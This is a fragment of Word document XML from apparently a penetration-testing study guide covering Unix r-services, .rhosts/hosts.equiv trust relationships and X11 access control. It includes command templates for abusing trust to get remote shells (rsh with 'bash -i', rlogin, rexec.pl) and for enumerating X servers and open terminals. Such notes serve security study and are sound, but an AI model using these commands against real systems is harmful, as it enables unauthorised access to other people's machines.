        <w:t>r* service:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A77C3" w:rsidRPr="00D61E92" w:rsidRDefault="001A77C3" w:rsidP="0013443A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D61E92">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Daemons:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A77C3" w:rsidRPr="00D61E92" w:rsidRDefault="001A77C3" w:rsidP="00D61E92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D61E92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="0013443A" w:rsidRPr="00D61E92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>exec</w:t>
      </w:r>
      <w:r w:rsidRPr="00D61E92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>d  - tcp port 512 (started by [x]inetd) – always requires a username and password</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013443A" w:rsidRPr="00D61E92" w:rsidRDefault="001A77C3" w:rsidP="00D61E92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D61E92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>r</w:t>
      </w:r>
      <w:r w:rsidR="0013443A" w:rsidRPr="00D61E92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
      <w:r w:rsidRPr="00D61E92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>d - tcp port 513 (started by [x]inetd)</w:t>
      </w:r>
      <w:r w:rsidR="00D61E92" w:rsidRPr="00D61E92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> – use hosts.equiv &amp; .rhost</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A77C3" w:rsidRPr="00D61E92" w:rsidRDefault="001A77C3" w:rsidP="00D61E92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="145"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D61E92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rshell - tcp port 514 (started by [x]inetd)</w:t>
      </w:r>
      <w:r w:rsidR="00D61E92" w:rsidRPr="00D61E92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> - use hosts.equiv &amp; .rhost</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001A77C3" w:rsidRPr="00D61E92" w:rsidRDefault="001A77C3" w:rsidP="0013443A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001A77C3" w:rsidRPr="00D61E92" w:rsidRDefault="001A77C3" w:rsidP="0013443A">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D61E92">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Clients:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013443A" w:rsidRPr="007721F5" w:rsidRDefault="0013443A" w:rsidP="007721F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="148"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007721F5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rsh</w:t>
      </w:r>
      <w:r w:rsidR="00077206" w:rsidRPr="007721F5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </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useradd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007721F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;allowed user&gt;</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su</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007721F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;allowed user&gt;</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rsh</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007721F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -l &lt;user&gt; &lt;target&gt; 'bash -i'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D61E92" w:rsidRPr="007721F5" w:rsidRDefault="001A77C3" w:rsidP="007721F5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="147"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007721F5">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rlogin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D61E92" w:rsidRPr="007721F5" w:rsidRDefault="00D61E92"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rlogin</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007721F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="007721F5" w:rsidRPr="007721F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>–i &lt;allowed user&gt; -l &lt;user&gt; &lt;target&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00077206" w:rsidRPr="007721F5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D61E92" w:rsidRPr="00D61E92" w:rsidRDefault="00D61E92" w:rsidP="00D61E92">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="146"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D61E92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>rexec</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013443A" w:rsidRPr="00D61E92" w:rsidRDefault="001A77C3" w:rsidP="00D61E92">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D61E92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>rexec.pl</w:t>
      </w:r>
      <w:r w:rsidR="00D61E92" w:rsidRPr="00D61E92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –h &lt;target&gt; -u &lt;user&gt; -p &lt;passwd&gt; -S</w:t>
      </w:r>
      <w:r w:rsidR="00D61E92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D61E92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00D61E92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
        <w:t>(shell 'sh –i')</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013443A" w:rsidRPr="007721F5" w:rsidRDefault="00D61E92" w:rsidP="007721F5">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D61E92">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>rexec.pl –h &lt;target&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> -u &lt;user&gt; -p &lt;passwd&gt; -c &lt;command&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>access</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> control (/etc/hosts.equiv and .rhosts)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F0433" w:rsidRPr="002F0433" w:rsidRDefault="002F0433" w:rsidP="002F0433">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0433">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The hosts.equiv and .rhosts files list hosts and users that are trusted by the local host when a connection is made using the rshd</w:t>
      </w:r>
      <w:r w:rsidR="001A77C3">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/rlogin</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0433">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> service.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The hosts.equiv file resides in the ROOTDIR/etc directory and lists the remote machines that may connect to the local machine and the </w:t>
      </w:r>
      <w:r w:rsidR="00D61E92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">remote </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0433">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">user names </w:t>
      </w:r>
      <w:r w:rsidR="00D61E92">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>that may connect</w:t>
      </w:r>
      <w:r w:rsidRPr="002F0433">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. The .rhosts file resides in a user's home </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0433">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">directory and specifies the remote machines and remote user names that the user may use to remotely log in to the local machine.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Each line of these files has the format: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F0433" w:rsidRPr="002F0433" w:rsidRDefault="002F0433" w:rsidP="002F0433">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F0433">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F0433">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> [username]</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F0433" w:rsidRPr="002F0433" w:rsidRDefault="002F0433" w:rsidP="002F0433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F0433">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>hostname</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F0433">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> may be given as a host name (typically, a fully qualified host name in a DNS environment), an address, or a + character indicating that all hosts are to be trusted. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F0433" w:rsidRPr="002F0433" w:rsidRDefault="002F0433" w:rsidP="002F0433">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="144"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="002F0433">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="002F0433">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, if specified, may be given as either a user name on the remote host or a + character indicating all users on hostname.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When the optional username is specified, only users with entries on the specified host may log in to the local machine. When username is not specified, any user that has the same user name on both the remote and local machines may log in to the local machine. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002F0433" w:rsidRPr="002F0433" w:rsidRDefault="002F0433" w:rsidP="002F0433">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0013443A" w:rsidRPr="002F0433" w:rsidRDefault="002F0433" w:rsidP="002F0433">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0433">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Note: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F0433">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Because the rsh and rcp utilities resend the current without the domain if it is too long and the rlogin utility does not, a user may require two entries in the hosts.equiv or .rhosts file. If the full name (including domain) is too long for the rshd service (or daemon) being used, the user needs one entry with the full user name (including domain) for use with rlogind and a second with the same user name minus the domain for use with rshd.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>•</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>trust</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> relationships</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0013443A" w:rsidRPr="002F0433" w:rsidRDefault="002F0433" w:rsidP="009D6D8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0433">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>As above</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t>F6b - Impact of poorly-configured trust relationships</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRPr="002F0433" w:rsidRDefault="002F0433" w:rsidP="009D6D8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F0433">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Unauthorised access</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>F7 -X11</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E5129" w:rsidRPr="00277483" w:rsidRDefault="001E5129" w:rsidP="00277483">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00277483">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>X Windows is commonly used by most major Unix-like operating systems as the underlying system for displaying graphical applications. X servers listen on TCP ports 6000 to 6063 (depending on the number of concurrent displays). Most of the time users simply access their local X server, although C can be accessed over a network for remote use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009D6D8E" w:rsidRDefault="009D6D8E" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">F7a - </w:t>
      </w:r>
      <w:r w:rsidRPr="009D6D8E">
        <w:t>X Windows security and configuration; host-based vs. User-based access control</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E5129" w:rsidRPr="00277483" w:rsidRDefault="001E5129" w:rsidP="009D6D8E">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00277483">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The two authentication mechanisms within X windows are xhost and xautrh.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001E5129" w:rsidRPr="00277483" w:rsidRDefault="001E5129" w:rsidP="00277483">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277483">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xhost</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277483">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> -Host based authentication allows user to specify which IP addresses and hosts have access to the X server. The xhost command is used with + and – options to allow and deny X access from individual hosts. Obviously xhost authentication is dangerous and doesn’t provide the granularity required in most environments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277483" w:rsidRPr="00277483" w:rsidRDefault="001E5129" w:rsidP="009D6D8E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="151"/>
        </w:numPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277483">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>xauth</w:t>
      </w:r>
      <w:r w:rsidR="001B5F10" w:rsidRPr="00277483">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="001B5F10" w:rsidRPr="00277483">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> This is the most secure mechanism, and generally to be recommended. The X server has a 'cookie' </w:t>
      </w:r>
      <w:r w:rsidR="00277483" w:rsidRPr="00277483">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">(MIT-MAGIC-COOKIE-1) </w:t>
      </w:r>
      <w:r w:rsidR="001B5F10" w:rsidRPr="00277483">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>which is like a temporary password. Only clients who know the password are</w:t>
      </w:r>
      <w:r w:rsidR="00277483" w:rsidRPr="00277483">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> allowed to access the server. </w:t>
      </w:r>
      <w:r w:rsidR="001B5F10" w:rsidRPr="00277483">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>The cookie is generated by xdm and stored in your home directory in the file .Xauthority. This file is maintained by the xauth program.</w:t>
      </w:r>
      <w:r w:rsidR="00277483" w:rsidRPr="00277483">
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00277483" w:rsidRPr="00277483">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Copying the magic cookie to other computers allows you run x clients on them.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277483" w:rsidRDefault="00277483" w:rsidP="00277483">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00277483" w:rsidRPr="00277483" w:rsidRDefault="00277483" w:rsidP="00277483">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00277483">
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Enumerating xservers:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277483" w:rsidRDefault="00277483" w:rsidP="00277483">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="D9D9D9" w:themeFill="background1" w:themeFillShade="D9"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00277483">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>xscan</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00277483">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;target[s]&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00277483" w:rsidRDefault="00277483" w:rsidP="00277483">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00277483" w:rsidRPr="0003487C" w:rsidRDefault="005E208E" w:rsidP="00277483">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF" w:themeFill="background1"/>
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0003487C">
        <w:rPr>
          <w:rFonts w:cs="Courier New"/>
          <w:b/>
          <w:i/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>List open terminals on X server:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="005E208E" w:rsidRPr="0003487C" w:rsidRDefault="005E208E"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xwininfo</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0003487C">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> –tree –root – display &lt;ip&gt;:0 | grep –i term</w:t>
      </w:r>
    </w:p>
